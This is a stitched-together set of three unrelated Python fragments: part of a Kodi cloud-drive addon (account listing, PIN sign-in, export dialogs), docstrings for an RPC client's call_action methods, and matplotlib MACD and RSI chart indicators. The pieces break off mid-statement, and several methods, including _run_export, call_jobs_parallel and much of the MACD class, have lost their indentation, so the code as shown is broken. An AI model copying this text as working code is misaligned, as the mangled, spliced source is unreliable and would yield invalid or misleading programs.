                   '_progress_dialog_bg', '_export_progress_dialog_bg',
                   '_system_monitor', '_account_manager'):
        delattr(self, helper)
def get_provider(self):
    """Return this addon's cloud provider implementation; concrete subclasses must override."""
    raise NotImplementedError()
def get_my_files_menu_name(self):
    """Return the localized label (common-addon string 32052) for the root files menu entry."""
    return self._common_addon.getLocalizedString(32052)
def get_custom_drive_folders(self, driveid):
    """Return provider-specific extra folders for the drive, or None.

    Default implementation returns None (no custom folders), which makes
    _list_drive fall straight through to listing '/'. Subclasses may
    override to return a list of folder dicts (see _list_drive for the
    keys it reads: 'path', 'name', optional 'params' and 'context_options').
    """
    return
def cancel_operation(self):
    """Truthy when the current operation should stop: Kodi is aborting, the
    progress dialog was cancelled, a cancel was requested programmatically,
    or the sign-in PIN dialog (when open) was cancelled.

    Evaluated left to right with short-circuiting, so later dialogs are only
    queried when the earlier checks are falsy.
    """
    return self._system_monitor.abortRequested() or self._progress_dialog.iscanceled() or self._cancel_operation or (self._pin_dialog and self._pin_dialog.iscanceled())
def _get_display_name(self, account, drive=None, with_format=False):
    """Delegate to the account manager to build a display name for an account (or one drive)."""
    return self._account_manager.get_account_display_name(account, drive, self.get_provider(), with_format)
def get_accounts(self, with_format=False):
    """Load all accounts and attach a 'display_name' to every drive of every account."""
    accounts = self._account_manager.load()
    for account in accounts.values():
        for drive in account['drives']:
            drive['display_name'] = self._get_display_name(account, drive, with_format)
    return accounts
def list_accounts(self):
    """Render the top-level plugin directory: one entry per drive plus an 'add account' entry.

    NOTE: the same `params` dict is mutated and re-encoded for each context
    option, so the order of the urlencode calls below matters.
    """
    accounts = self.get_accounts(with_format=True)
    listing = []
    for account_id in accounts:
        account = accounts[account_id]
        size = len(account['drives'])
        for drive in account['drives']:
            context_options = []
            # Search within this drive (opens in the current window).
            params = {'action':'_search', 'content_type': self._content_type, 'driveid': drive['id']}
            cmd = 'ActivateWindow(%d,%s?%s)' % (xbmcgui.getCurrentWindowId(), self._addon_url, urllib.urlencode(params))
            context_options.append((self._common_addon.getLocalizedString(32039), cmd))
            # Remove the whole account.
            params['action'] = '_remove_account'
            context_options.append((self._common_addon.getLocalizedString(32006), 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'))
            # Only offer removing a single drive when the account has more than one.
            if size > 1:
                params['action'] = '_remove_drive'
                cmd = 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'
                context_options.append((self._common_addon.getLocalizedString(32007), cmd))
            list_item = xbmcgui.ListItem(drive['display_name'])
            list_item.addContextMenuItems(context_options)
            # Default click action: browse the drive.
            params = {'action':'_list_drive', 'content_type': self._content_type, 'driveid': drive['id']}
            url = self._addon_url + '?' + urllib.urlencode(params)
            listing.append((url, list_item, True))
    # Trailing non-folder entry to add a new account.
    list_item = xbmcgui.ListItem(self._common_addon.getLocalizedString(32005))
    params = {'action':'_add_account', 'content_type': self._content_type}
    url = self._addon_url + '?' + urllib.urlencode(params)
    listing.append((url, list_item))
    xbmcplugin.addDirectoryItems(self._addon_handle, listing, len(listing))
    xbmcplugin.endOfDirectory(self._addon_handle, True)
def _add_account(self):
    """Run the full sign-in flow: create a PIN, wait for the user to authorize it,
    fetch tokens/account/drives, persist the account, and clean up migrated duplicates.

    Returns early (without error) whenever the user cancels or the PIN times out.
    """
    # Shared callbacks for Request retry/progress handling.
    request_params = {
        'waiting_retry': lambda request, remaining: self._progress_dialog_bg.update(
            int((request.current_delay - remaining)/request.current_delay*100),
            heading=self._common_addon.getLocalizedString(32043) % ('' if request.current_tries == 1 else ' again'),
            message=self._common_addon.getLocalizedString(32044) % str(int(remaining)) + ' ' +
            self._common_addon.getLocalizedString(32045) % (str(request.current_tries + 1), str(request.tries))
        ),
        'on_complete': lambda request: (self._progress_dialog.close(), self._progress_dialog_bg.close()),
        'cancel_operation': self.cancel_operation,
        'wait': self._system_monitor.waitForAbort
    }
    provider = self.get_provider()
    self._progress_dialog.update(0, self._common_addon.getLocalizedString(32008))
    # Capture the public IP before the PIN flow; used below to show the source id.
    self._ip_before_pin = Request(KodiUtils.get_signin_server() + '/ip', None).request()
    pin_info = provider.create_pin(request_params)
    self._progress_dialog.close()
    if self.cancel_operation():
        return
    if not pin_info:
        raise Exception('Unable to retrieve a pin code')
    tokens_info = {}
    request_params['on_complete'] = lambda request: self._progress_dialog_bg.close()
    # QR dialog pointing the user at the sign-in URL with their PIN.
    self._pin_dialog = QRDialogProgress.create(self._addon_name,
                                               KodiUtils.get_signin_server() + '/signin/%s' % pin_info['pin'],
                                               self._common_addon.getLocalizedString(32009),
                                               self._common_addon.getLocalizedString(32010) % ('[B]%s[/B]' % KodiUtils.get_signin_server(), '[B][COLOR lime]%s[/COLOR][/B]' % pin_info['pin']))
    self._pin_dialog.show()
    # Poll for tokens until timeout/cancel; the dialog's progress bar counts down.
    max_waiting_time = time.time() + self._DEFAULT_SIGNIN_TIMEOUT
    while not self.cancel_operation() and max_waiting_time > time.time():
        remaining = round(max_waiting_time-time.time())
        percent = int(remaining/self._DEFAULT_SIGNIN_TIMEOUT*100)
        self._pin_dialog.update(percent, line3='[CR]'+self._common_addon.getLocalizedString(32011) % str(int(remaining)) + '[CR][CR]Your source id is: %s' % Utils.get_source_id(self._ip_before_pin))
        # Only hit the token endpoint every 5 seconds (and on the final second).
        if int(remaining) % 5 == 0 or remaining == 1:
            tokens_info = provider.fetch_tokens_info(pin_info, request_params = request_params)
            if self.cancel_operation() or tokens_info:
                break
        if self._system_monitor.waitForAbort(1):
            break
    self._pin_dialog.close()
    if self.cancel_operation() or time.time() >= max_waiting_time:
        return
    if not tokens_info:
        raise Exception('Unable to retrieve the auth2 tokens')
    # Tokens in hand: fetch account metadata, then drives, then persist.
    self._progress_dialog.update(25, self._common_addon.getLocalizedString(32064),' ',' ')
    try:
        account = provider.get_account(request_params = request_params, access_tokens = tokens_info)
    except Exception as e:
        raise UIException(32065, e)
    if self.cancel_operation():
        return
    self._progress_dialog.update(50, self._common_addon.getLocalizedString(32017))
    try:
        account['drives'] = provider.get_drives(request_params = request_params, access_tokens = tokens_info)
    except Exception as e:
        raise UIException(32018, e)
    if self.cancel_operation():
        return
    self._progress_dialog.update(75, self._common_addon.getLocalizedString(32020))
    try:
        account['access_tokens'] = tokens_info
        self._account_manager.add_account(account)
    except Exception as e:
        raise UIException(32021, e)
    if self.cancel_operation():
        return
    self._progress_dialog.update(90)
    # Best-effort cleanup: drop old accounts of type 'migrated' that collide with
    # the new account's drive ids. Failures here are deliberately ignored.
    try:
        accounts = self._account_manager.load()
        for drive in account['drives']:
            driveid = drive['id']
            Logger.debug('Looking for account %s...' % driveid)
            if driveid in accounts:
                drive = accounts[driveid]['drives'][0]
                Logger.debug(drive)
                if drive['id'] == driveid and drive['type'] == 'migrated':
                    Logger.debug('Account %s removed.' % driveid)
                    self._account_manager.remove_account(driveid)
    except Exception as e:
        pass
    if self.cancel_operation():
        return
    self._progress_dialog.close()
    KodiUtils.executebuiltin('Container.Refresh')
def _remove_drive(self, driveid):
    """Ask for confirmation and, if granted, remove a single drive and refresh the view."""
    self._account_manager.load()
    account = self._account_manager.get_account_by_driveid(driveid)
    drive = self._account_manager.get_drive_by_driveid(driveid)
    prompt = self._common_addon.getLocalizedString(32023) % self._get_display_name(account, drive, True)
    if not self._dialog.yesno(self._addon_name, prompt, None):
        return
    self._account_manager.remove_drive(driveid)
    KodiUtils.executebuiltin('Container.Refresh')
def _remove_account(self, driveid):
    """Ask for confirmation and, if granted, remove the whole account owning the drive."""
    self._account_manager.load()
    account = self._account_manager.get_account_by_driveid(driveid)
    prompt = self._common_addon.getLocalizedString(32022) % self._get_display_name(account, with_format=True)
    if not self._dialog.yesno(self._addon_name, prompt, None):
        return
    self._account_manager.remove_account(account['id'])
    KodiUtils.executebuiltin('Container.Refresh')
def _list_drive(self, driveid):
    """Render a drive's top-level menu.

    If the provider exposes custom folders, show 'my files' plus those folders
    (plus an exports entry for audio/video); otherwise list '/' directly.
    """
    drive_folders = self.get_custom_drive_folders(driveid)
    if self.cancel_operation():
        return
    if drive_folders:
        listing = []
        # Bold "my files" entry for the drive root.
        url = self._addon_url + '?' + urllib.urlencode({'action':'_list_folder', 'path': '/', 'content_type': self._content_type, 'driveid': driveid})
        listing.append((url, xbmcgui.ListItem('[B]%s[/B]' % self.get_my_files_menu_name()), True))
        for folder in drive_folders:
            params = {'action':'_list_folder', 'path': folder['path'], 'content_type': self._content_type, 'driveid': driveid}
            # Folder-supplied params override/extend the defaults.
            if 'params' in folder:
                params.update(folder['params'])
            url = self._addon_url + '?' + urllib.urlencode(params)
            list_item = xbmcgui.ListItem(Utils.unicode(folder['name']))
            if 'context_options' in folder:
                list_item.addContextMenuItems(folder['context_options'])
            listing.append((url, list_item, True))
        # Exports only make sense for audio/video content.
        if self._content_type == 'video' or self._content_type == 'audio':
            url = self._addon_url + '?' + urllib.urlencode({'action':'_list_exports', 'content_type': self._content_type, 'driveid': driveid})
            listing.append((url, xbmcgui.ListItem(self._common_addon.getLocalizedString(32000)), True))
        xbmcplugin.addDirectoryItems(self._addon_handle, listing, len(listing))
        xbmcplugin.endOfDirectory(self._addon_handle, True)
    else:
        self._list_folder(driveid, path='/')
def _list_exports(self, driveid):
    """Render the exports configured for this drive and content type, with run/delete context options."""
    self._export_manager = ExportManager(self._account_manager._addon_data_path)
    exports = self._export_manager.load()
    listing = []
    for exportid in exports:
        export = exports[exportid]
        # Only show exports belonging to this drive and the current content type.
        if export['driveid'] == driveid and export['content_type'] == self._content_type:
            item_name = Utils.unicode(export['name'])
            params = {'action':'_open_export', 'content_type': self._content_type, 'driveid': driveid, 'item_driveid': export['item_driveid'], 'item_id': export['id'], 'name': urllib.quote(Utils.str(item_name))}
            url = self._addon_url + '?' + urllib.urlencode(params)
            list_item = xbmcgui.ListItem(item_name)
            context_options = []
            # Context menu: run the export now, or remove it (Kodi core strings 21479/1210).
            params['action'] = '_run_export'
            context_options.append((KodiUtils.localize(21479), 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'))
            params['action'] = '_remove_export'
            context_options.append((KodiUtils.localize(1210), 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'))
            list_item.addContextMenuItems(context_options)
            listing.append((url, list_item, True))
    xbmcplugin.addDirectoryItems(self._addon_handle, listing, len(listing))
    xbmcplugin.endOfDirectory(self._addon_handle, True)
def _remove_export(self, driveid, item_id):
    """Confirm and delete an export definition, optionally keeping the exported local files."""
    self._export_manager = ExportManager(self._account_manager._addon_data_path)
    item = self._export_manager.load()[item_id]
    item_name = Utils.unicode(item['name'])
    if self._dialog.yesno(self._addon_name, self._common_addon.getLocalizedString(32001) % item_name):
        # Second prompt: keep the already-exported files on disk?
        keep_locals = self._dialog.yesno(self._addon_name, self._common_addon.getLocalizedString(32086) % item_name)
        if keep_locals:
            self._export_manager.remove_export(item_id)
        else:
            self._export_manager.remove_export(item_id, False)
    # Refresh regardless of the user's answer, matching the original flow.
    KodiUtils.executebuiltin('Container.Refresh')
def _open_export(self, driveid, item_driveid, item_id, name):
    """Show the export configuration dialog; if the user chose to run it, start the export in a daemon thread."""
    export_dialog = ExportMainDialog.create(self._content_type, driveid, item_driveid, item_id, name,
                                            self._account_manager, self.get_provider())
    export_dialog.doModal()
    if not export_dialog.run:
        return
    worker = threading.Thread(target=self._run_export, args=(driveid, item_id,))
    worker.daemon = True
    worker.start()
def _run_export(self, driveid, item_id=None):
self._export_manager = ExportManager(self._account_manager._addon_data_path)
export = self._export_manager.load()[item_id]
Logger.debug('Running export:')
Logger.debug(export)
if Utils.get_safe_value(export, 'exporting', False):
self._dialog.ok(self._addon_name, self._common_addon.getLocalizedString(32059) + ' ' + self._common_addon.getLocalizedString(32038))
else:
export['exporting'] = True
self._export_manager.save()
export_folder = export['destination_folder']
if xbmcvfs.exists(export_folder):
self.get_provider().configure(self._account_manager, driveid)
self._export_progress_dialog_bg.create(self._addon_name + ' ' + self._common_addon.getLocalizedString(32024), self._common_addon.getLocalizedString(32025))
self._export_progress_dialog_bg.update(0)
item = self.get_provider().get_item(export['item_driveid'], item_id)
if self.cancel_operation():
return
if self._child_count_supported:
self._exporting_target = int(item['folder']['child_count'])
self._exporting_target += 1
folder_name = Utils.unicode(item['name'])
folder_path = os.path.join(os.path.join(export_folder, folder_name), '')
if self._addon.getSetting('clean_folder') != 'true' or not xbmcvfs.exists(folder_path) or Utils.remove_folder(folder_path):
self._exporting = item_id
export_items_info = {}
ExportManager.add_item_info(export_items_info, item_id, folder_name, | |
errors), available as an
`actions` property on the exception instance.
:type actions: list[ActionResponse]
"""
self.actions = actions or []
def __str__(self):
    """Summarize every failed action as "<action>: <errors>", one per line."""
    lines = ['{a.action}: {a.errors}'.format(a=response) for response in self.actions]
    return 'Error calling action(s):\n{}'.format('\n'.join(lines))
# Blocking methods that send a request and wait until a response is available
def call_action(self, service_name, action, body=None, **kwargs):
    """
    Build and send a single job request with one action.
    Returns the action response or raises an exception if the action response is an error (unless
    `raise_action_errors` is passed as `False`) or if the job response is an error (unless `raise_job_errors` is
    passed as `False`).
    :param service_name: The name of the service to call
    :type service_name: union[str, unicode]
    :param action: The name of the action to call
    :type action: union[str, unicode]
    :param body: The action request body
    :type body: dict
    :param expansions: A dictionary representing the expansions to perform
    :type expansions: dict
    :param raise_job_errors: Whether to raise a JobError if the job response contains errors (defaults to `True`)
    :type raise_job_errors: bool
    :param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
                                to `True`)
    :type raise_action_errors: bool
    :param timeout: If provided, this will override the default transport timeout values; requests will expire
                    after this number of seconds plus some buffer defined by the transport, and the client will not
                    block waiting for a response for longer than this amount of time.
    :type timeout: int
    :param switches: A list of switch value integers
    :type switches: list
    :param correlation_id: The request correlation ID
    :type correlation_id: union[str, unicode]
    :param continue_on_error: Whether to continue executing further actions once one action has returned errors
    :type continue_on_error: bool
    :param context: A dictionary of extra values to include in the context header
    :type context: dict
    :param control_extra: A dictionary of extra values to include in the control header
    :type control_extra: dict
    :return: The action response
    :rtype: ActionResponse
    :raise: ConnectionError, InvalidField, MessageSendError, MessageSendTimeout, MessageTooLarge,
            MessageReceiveError, MessageReceiveTimeout, InvalidMessage, JobError, CallActionError
    """
    # Delegate to the future-based variant and block on its result.
    return self.call_action_future(service_name, action, body, **kwargs).result()
def call_actions(
    self,
    service_name,
    actions,
    expansions=None,
    raise_job_errors=True,
    raise_action_errors=True,
    timeout=None,
    **kwargs
):
    """
    Build and send a single job request with one or more actions.
    Returns a list of action responses, one for each action in the same order as provided, or raises an exception
    if any action response is an error (unless `raise_action_errors` is passed as `False`) or if the job response
    is an error (unless `raise_job_errors` is passed as `False`).
    This method performs expansions if the Client is configured with an expansion converter.
    :param service_name: The name of the service to call
    :type service_name: union[str, unicode]
    :param actions: A list of `ActionRequest` objects and/or dicts that can be converted to `ActionRequest` objects
    :type actions: iterable[union[ActionRequest, dict]]
    :param expansions: A dictionary representing the expansions to perform
    :type expansions: dict
    :param raise_job_errors: Whether to raise a JobError if the job response contains errors (defaults to `True`)
    :type raise_job_errors: bool
    :param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
                                to `True`)
    :type raise_action_errors: bool
    :param timeout: If provided, this will override the default transport timeout values; requests will expire
                    after this number of seconds plus some buffer defined by the transport, and the client will not
                    block waiting for a response for longer than this amount of time.
    :type timeout: int
    :param switches: A list of switch value integers
    :type switches: list
    :param correlation_id: The request correlation ID
    :type correlation_id: union[str, unicode]
    :param continue_on_error: Whether to continue executing further actions once one action has returned errors
    :type continue_on_error: bool
    :param context: A dictionary of extra values to include in the context header
    :type context: dict
    :param control_extra: A dictionary of extra values to include in the control header
    :type control_extra: dict
    :return: The job response
    :rtype: JobResponse
    :raise: ConnectionError, InvalidField, MessageSendError, MessageSendTimeout, MessageTooLarge,
            MessageReceiveError, MessageReceiveTimeout, InvalidMessage, JobError, CallActionError
    """
    # Delegate to the future-based variant and block on its result.
    return self.call_actions_future(
        service_name,
        actions,
        expansions,
        raise_job_errors,
        raise_action_errors,
        timeout,
        **kwargs
    ).result()
def call_actions_parallel(self, service_name, actions, **kwargs):
    """
    Build and send multiple job requests to one service, each job with one action, to be executed in parallel, and
    return once all responses have been received.
    Returns a generator of action responses, one for each action in the same order as provided, or raises an
    exception if any action response is an error (unless `raise_action_errors` is passed as `False`) or if any job
    response is an error (unless `raise_job_errors` is passed as `False`).
    This method performs expansions if the Client is configured with an expansion converter.
    :param service_name: The name of the service to call
    :type service_name: union[str, unicode]
    :param actions: A list of `ActionRequest` objects and/or dicts that can be converted to `ActionRequest` objects
    :type actions: iterable[union[ActionRequest, dict]]
    :param expansions: A dictionary representing the expansions to perform
    :type expansions: dict
    :param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
                                to `True`)
    :type raise_action_errors: bool
    :param timeout: If provided, this will override the default transport timeout values; requests will expire
                    after this number of seconds plus some buffer defined by the transport, and the client will not
                    block waiting for a response for longer than this amount of time.
    :type timeout: int
    :param switches: A list of switch value integers
    :type switches: list
    :param correlation_id: The request correlation ID
    :type correlation_id: union[str, unicode]
    :param continue_on_error: Whether to continue executing further actions once one action has returned errors
    :type continue_on_error: bool
    :param context: A dictionary of extra values to include in the context header
    :type context: dict
    :param control_extra: A dictionary of extra values to include in the control header
    :type control_extra: dict
    :return: A generator of action responses
    :rtype: Generator[ActionResponse]
    :raise: ConnectionError, InvalidField, MessageSendError, MessageSendTimeout, MessageTooLarge,
            MessageReceiveError, MessageReceiveTimeout, InvalidMessage, JobError, CallActionError
    """
    # Delegate to the future-based variant and block on its result.
    return self.call_actions_parallel_future(service_name, actions, **kwargs).result()
def call_jobs_parallel(
self,
jobs,
expansions=None,
raise_job_errors=True,
raise_action_errors=True,
catch_transport_errors=False,
timeout=None,
**kwargs
):
"""
Build and send multiple job requests to one or more services, each with one or more actions, to be executed in
parallel, and return once all responses have been received.
Returns a list of job responses, one for each job in the same order as provided, or raises an exception if any
job response is an error (unless `raise_job_errors` is passed as `False`) or if any action response is an
error (unless `raise_action_errors` is passed as `False`).
This method performs expansions if the Client is configured with an expansion converter.
:param jobs: A list of job request dicts, each containing `service_name` and `actions`, where `actions` is a
list of `ActionRequest` objects and/or dicts that can be converted to `ActionRequest` objects
:type jobs: iterable[dict(service_name=union[str, unicode], actions=list[union[ActionRequest, dict]])]
:param expansions: A dictionary representing the expansions to perform
:type expansions: dict
:param raise_job_errors: Whether to raise a JobError if any job responses contain errors (defaults to `True`)
:type raise_job_errors: bool
:param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
to `True`)
:type raise_action_errors: bool
:param catch_transport_errors: Whether to catch transport errors and return them instead of letting them
propagate. By default (`False`), the errors `ConnectionError`,
`InvalidMessageError`, `MessageReceiveError`, `MessageReceiveTimeout`,
`MessageSendError`, `MessageSendTimeout`, and `MessageTooLarge`, when raised by
the transport, cause the entire process to terminate, potentially losing
responses. If this argument is set to `True`, those errors are, instead, caught,
and they are returned in place of their corresponding responses in the returned
list of job responses.
:type catch_transport_errors: bool
:param timeout: If provided, this will override the default transport timeout values to; requests will expire
after this number of seconds plus some buffer defined by the transport, and the client will not
block waiting for a response for longer than this amount of time.
:type timeout: int
:param switches: A list of switch value integers
:type switches: list
:param correlation_id: The request correlation ID
:type correlation_id: union[str, unicode]
:param continue_on_error: Whether to continue executing further actions once one action has | |
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from abc import ABC, abstractmethod
class Indicator(ABC):
    """Abstract base class for chart indicators.

    Defines the lifecycle every indicator must implement:
    loadHistory -> initPlot -> repeated update/draw -> drawArtists.
    """
    def __init__(self, ax, xlims):
        # All indicators have these attributes initialized
        # Make sure the indicator class calls super()
        self.ax = ax          # matplotlib axes this indicator draws on
        self.xlims = xlims    # visible x-range [left, right], shared with the main chart
        self.active = False   # when True, draw() implementations show the "[X]" label
        self.removeX = ax.text(0,0, "[X]", fontsize=9, color="#9e9e9e")  # clickable close label
        self.ax.set_facecolor("#1e1e1e")  # dark chart background
    @abstractmethod
    def initPlot(self, i):
        """Plot the data computed by loadHistory on the indicator axis and
        store the chart objects (artists) as attributes."""
        pass
    @abstractmethod
    def loadHistory(self, ohlc, data, vol, histCnt):
        """Compute the indicator's history from the given data and store it
        as attributes for initPlot/draw to use."""
        pass
    @abstractmethod
    def update(self, ohlc, vol, currInt, retain=True):
        """Update the most recent data point.

        When retain is False the time period has incremented: permanently
        store the most recent data point and append a new one.
        """
        pass
    @abstractmethod
    def draw(self, currInt):
        """Push the most recently updated data point into the chart artists."""
        pass
    @abstractmethod
    def drawArtists(self, redraw):
        """Actually draw the artists on the axes.

        When redraw is True, draw the artists that are NOT redrawn every
        frame; otherwise draw the ones that ARE redrawn every frame.
        """
        pass
    # --- Inherit these, don't override --- #
    def X_Clicked(self, event):
        """Return True when the mouse event hit this indicator's "[X]" label."""
        return self.removeX.contains(event)[0]
class MACD(Indicator):
def __init__(self, ax, xlims, ema1=26, ema2=12, ema3=9):
super(MACD, self).__init__(ax, xlims)
self.macdBars = []
self.macd = []
self.ema1 = 0
self.ema2 = 0
self.ema3 = 0
self.ema1pd = ema1
self.ema2pd = ema2
self.ema3pd = ema3
self.ema1Wt = 2 / (self.ema1pd+1)
self.ema2Wt = 2 / (self.ema2pd+1)
self.ema3Wt = 2 / (self.ema3pd+1)
self.deriv = []
self.derivLine = None
self.deriv_dx = 2
self.green = "#22d615"
self.red = "#ea2222"
self.ax.set_ylabel("MACD (%d, %d, %d)" % (self.ema2pd, self.ema1pd, self.ema3pd), fontsize=9)
def initPlot(self, i):
self.macdBars = self.ax.bar(range(i+1), self.macd).patches
for bar,v in zip(self.macdBars, self.macd):
bar.set_height(v)
if v < 0: bar.set_color(self.red)
else: bar.set_color(self.green)
self.derivLine, = self.ax.plot(range(self.deriv_dx, i+1), self.deriv, "-", c="white", linewidth=0.7)
def calcEMAfromHistory(self, data, histCnt):
numEx = len(data)
ema1Start = histCnt + self.ema1pd+self.ema3pd
ema2Start = min(ema1Start - (self.ema1pd-self.ema2pd), histCnt + self.ema2pd+self.ema3pd)
# First EMA value is a SMA
# calculate SMA for first X intervals of emaX
for i in range(self.ema1pd):
# price ema 1
idx = ema1Start-1-i
temp = [float(x[idx][4]) for x in data if x[idx][-1]] # data has been modified so last element is bool classifying its validity
self.ema1 += sum(temp) / len(temp)
# price ema 2
if i < self.ema2pd:
idx = ema2Start-1-i
self.ema2 += sum(temp) / len(temp)#sum([float(x[idx][4]) for x in data]) / numEx
self.ema1 /= self.ema1pd
self.ema2 /= self.ema2pd
self.ema3 += (self.ema2 - self.ema1)
# calculate SMA of (ema2-ema1)
for i in range(self.ema3pd-1,0,-1):
idx = histCnt+i
temp = [float(x[idx][4]) for x in data if x[idx][-1]]
p = sum(temp) / len(temp)
# ema = price * ema_weight + prev_ema * (1 - ema_weight)
self.ema1 = p * self.ema1Wt + self.ema1 * (1 - self.ema1Wt)
self.ema2 = p * self.ema2Wt + self.ema2 * (1 - self.ema2Wt)
self.ema3 += (self.ema2 - self.ema1)
self.ema3 /= self.ema3pd
def loadHistory(self, ohlc, data, vol, histCnt):
# MACD = EMA_9 of (EMA_12 - EMA_26)
# Derivative = (MACD_i+2 - MACD_i) / 2
# calculate EMAs for history data before displayed data
self.calcEMAfromHistory(data, histCnt)
for i in range(histCnt):
idx = histCnt - i - 1
if idx == 0:
self.macd.append(0)
self.deriv.append(0)
continue
self.ema1 = ohlc[i][4] * self.ema1Wt + self.ema1 * (1-self.ema1Wt)
self.ema2 = ohlc[i][4] * self.ema2Wt + self.ema2 * (1-self.ema2Wt)
self.ema3 = (self.ema2-self.ema1) * self.ema3Wt + self.ema3 * (1-self.ema3Wt)
self.macd.append((self.ema2-self.ema1) - self.ema3)
if i >= self.deriv_dx:
self.deriv.append((self.macd[i] - self.macd[i-self.deriv_dx]) / self.deriv_dx)
def update(self, ohlc, vol, currInt, retain=True):
tempEMA1 = ohlc[currInt][4] * self.ema1Wt + self.ema1 * (1 - self.ema1Wt)
tempEMA2 = ohlc[currInt][4] * self.ema2Wt + self.ema2 * (1 - self.ema2Wt)
tempEMA3 = (tempEMA2 - tempEMA1) * self.ema3Wt + self.ema3 * (1 - self.ema3Wt)
self.macd[currInt] = (tempEMA2 - tempEMA1) - tempEMA3
self.deriv[-1] = (self.macd[-1] - self.macd[-3]) / self.deriv_dx
if not retain:
self.ema1 = tempEMA1
self.ema2 = tempEMA2
self.ema3 = tempEMA3
self.addBar(currInt+1)
self.deriv.append(0)
def addBar(self, i):
self.macd.append(0)
self.macdBars.append(mpatches.Rectangle((i - 0.4, 0), width=0.8, height=0))
self.ax.add_patch(self.macdBars[-1])
def draw(self, currInt):
try:
self.macdBars[currInt].set_height(self.macd[currInt])
if self.macd[currInt] < 0:
self.macdBars[currInt].set_color(self.red)
else:
self.macdBars[currInt].set_color(self.green)
self.derivLine.set_data(range(self.deriv_dx,currInt+1), self.deriv)
# find min and max values being plotted to set the bounds of the y-axis
maxMacd = max(self.macd[max(0, self.xlims[0]):self.xlims[1]])
minMacd = min(self.macd[max(0, self.xlims[0]):self.xlims[1]])
maxDeriv = max(self.deriv[max(0, self.xlims[0]):self.xlims[1]])
minDeriv = min(self.deriv[max(0, self.xlims[0]):self.xlims[1]])
maxMacd = max(maxMacd, maxDeriv)
minMacd = min(minMacd, minDeriv)
buf = (maxMacd - minMacd) * 0.12
self.ax.set_ylim(min(0, minMacd - buf), max(0, maxMacd+buf))
if self.active: self.removeX.set_text("[X]")
else: self.removeX.set_text("")
self.removeX.set_position(((self.xlims[1] - self.xlims[0])*0.97 + self.xlims[0], min(0, minMacd-buf/2)))
except Exception as e:
print("Could not draw MACD:", e)
def drawArtists(self, redraw):
    """Blit the MACD artists: every visible bar on a full redraw, otherwise
    only the rightmost bar; always the derivative line and close button."""
    last = min(self.xlims[1] + 1, len(self.macdBars) - 1)
    if redraw:
        first = max(0, self.xlims[0])
        for bar in self.macdBars[first:last]:
            self.ax.draw_artist(bar)
    else:
        self.ax.draw_artist(self.macdBars[last])
    self.ax.draw_artist(self.derivLine)
    self.ax.draw_artist(self.removeX)
class RSI(Indicator):
def __init__(self, ax, xlims):
    """14-period RSI pane: Wilder running averages plus plot artists."""
    super(RSI, self).__init__(ax, xlims)
    self.xlims = xlims
    # Wilder smoothed averages of gains/losses and the computed RSI series.
    self.avgGain = 0
    self.avgLoss = 0
    self.lastPrice = 0
    self.rsi = []
    # Plot artists; created lazily by initPlot().
    self.rsiPlot = None
    self.hiThresh = None
    self.loThresh = None
    self.rsiText = None
    self.over_fill = []
    # Fixed 0-100 axis, labelled with the period length.
    self.ax.set_ylabel("RSI (14)", fontsize=8)
    self.ax.set_ylim(0, 100)
def initPlot(self, i):
    """Create the RSI line, the 70/30 threshold lines, the label text, and
    the overbought/oversold fill regions for the first i+1 samples."""
    xs = range(i+1)
    self.rsiPlot, = self.ax.plot(xs, self.rsi, "-", c="yellow", linewidth=0.9)
    self.hiThresh, = self.ax.plot(self.xlims, [70,70], "--", c="white", linewidth=0.5)
    self.loThresh, = self.ax.plot(self.xlims, [30,30], "--", c="white", linewidth=0.5)
    self.rsiText = self.ax.text(0, 0, "", fontsize=9, color="#cecece")
    # Shade wherever the RSI is above the overbought band (>70, red)
    # or below the oversold band (<30, blue).
    upper = [70] * len(self.rsi)
    lower = [30] * len(self.rsi)
    above = [v > 70 for v in self.rsi]
    below = [v < 30 for v in self.rsi]
    self.over_fill.append(self.ax.fill_between(xs, self.rsi, upper, where=above, facecolor="red", interpolate=True))
    self.over_fill.append(self.ax.fill_between(xs, self.rsi, lower, where=below, facecolor="blue", interpolate=True))
def loadHistory(self, ohlc, data, vol, histCnt):
    """Seed the RSI series: warm up Wilder's smoothed averages on history
    preceding the displayed candles, then compute RSI per displayed bar.

    ohlc: displayed candles; rows indexed as (time, open, ..., close at 4).
    data: per-source candle arrays; each row's last element is a bool
          validity flag, and valid rows are averaged across sources.
    vol: unused here.
    histCnt: number of trailing intervals of `data` that are displayed
             (excluded from the warm-up pass).

    NOTE(review): if avgLoss is 0 (no down candle seen yet) the RSI
    expression divides by zero -- confirm inputs guarantee a loss occurs.
    """
    #                          100
    #     RSI = 100 - --------------------
    #                 (1 + avgGain/avgLoss)
    #
    # calculate rsi for history data that occurs before the displayed data
    n = min([len(d) for d in data])  # shortest source bounds the usable history
    for i in range(n - histCnt):
        idx = n-i-1
        # average open/close across sources whose row is flagged valid
        temp = [float(x[idx][1]) for x in data if x[idx][-1]] # data has been modified so last element is bool classifying the validity
        tempOpen = sum(temp) / len(temp)
        temp = [float(x[idx][4]) for x in data if x[idx][-1]]
        tempClose = sum(temp) / len(temp)
        diff = tempClose - tempOpen
        # find average of first 14 periods
        if i < 14:
            if diff < 0:
                self.avgLoss -= diff
            else:
                self.avgGain += diff
            if i == 13:
                self.avgGain /= 14
                self.avgLoss /= 14
        # remaining periods = (prev_avg * 13 + current_diff) / 14
        else:
            if diff < 0:
                self.avgLoss = (self.avgLoss * 13 - diff)
                self.avgGain *= 13
            else:
                self.avgGain = (self.avgGain * 13 + diff)
                self.avgLoss *= 13
            self.avgGain /= 14
            self.avgLoss /= 14
            self.rsi.append(100 - (100 / (1 + (self.avgGain / self.avgLoss))))
    # calculate rsi for every interval of displayed data
    for i in range(len(ohlc)-1):
        diff = ohlc[i][4] - ohlc[i][1]
        if diff < 0:
            self.avgLoss = (self.avgLoss * 13 - diff)
            self.avgGain *= 13
        else:
            self.avgGain = (self.avgGain * 13 + diff)
            self.avgLoss *= 13
        self.avgGain /= 14
        self.avgLoss /= 14
        self.rsi.append(100 - (100 / (1 + (self.avgGain / self.avgLoss))))
def resetRSItime(self):
gains = self.avgGain
